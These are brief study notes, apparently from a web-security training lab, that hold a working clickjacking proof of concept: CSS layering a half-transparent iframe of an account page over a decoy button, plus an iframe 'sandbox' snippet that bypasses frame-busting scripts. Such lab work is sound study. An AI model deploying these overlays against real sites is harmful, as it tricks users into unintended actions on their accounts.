Clickjacking PoC
<style>
iframe {
position:relative;
width:99vw;
height: 99vh;
opacity: 0.5;
z-index: 2;
}
div {
position:absolute;
top:300px;
left:400px;
z-index: 1;
}
</style>
<div>Test me</div>
<iframe src="https://0a96005403001104812e3ea900bf0098.web-security-academy.net/my-account"></iframe>
Clickbandit
Scripts Blocking Iframes
sandbox
attribute
<iframe id="victim_website" src="https://{vulnerable_site}.com" sandbox="allow-forms"></iframe>